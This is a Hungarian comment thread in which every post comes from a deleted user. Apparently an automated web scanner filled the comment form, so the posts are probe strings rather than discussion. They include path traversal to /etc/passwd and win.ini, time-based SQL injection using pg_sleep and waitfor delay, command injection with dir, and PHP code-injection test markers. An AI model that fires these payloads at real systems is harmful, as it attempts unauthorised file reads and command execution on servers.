../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
)
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
&dir
több mint 5 éve
Törölt felhasználó
20';select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
!(()&&!|*|*|
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
több mint 5 éve
Törölt felhasználó
20; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
^(#$!@#$)(()))******
több mint 5 éve
Törölt felhasználó
'"()
több mint 5 éve
Törölt felhasználó
"&dir&"
több mint 5 éve
Törölt felhasználó
20'; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
|dir
több mint 5 éve
Törölt felhasználó
20"; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
/\../\../\../\../\../\../\../etc/passwd
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
több mint 5 éve
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
WEB-INF/web.xml
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
WEB-INF\web.xml
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
több mint 5 éve
Törölt felhasználó
acunetix_wvs_invalid_filename
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
1'"
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
több mint 5 éve
Törölt felhasználó
//www.acunetix.tst
több mint 5 éve
Törölt felhasználó
\
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini.jpg
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
comment/.
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
@@ekoWF
több mint 5 éve
Törölt felhasználó


]>
&acunetixent;
több mint 5 éve
Törölt felhasználó
'"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
................windowswin.ini
több mint 5 éve
Törölt felhasználó
JyI=
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó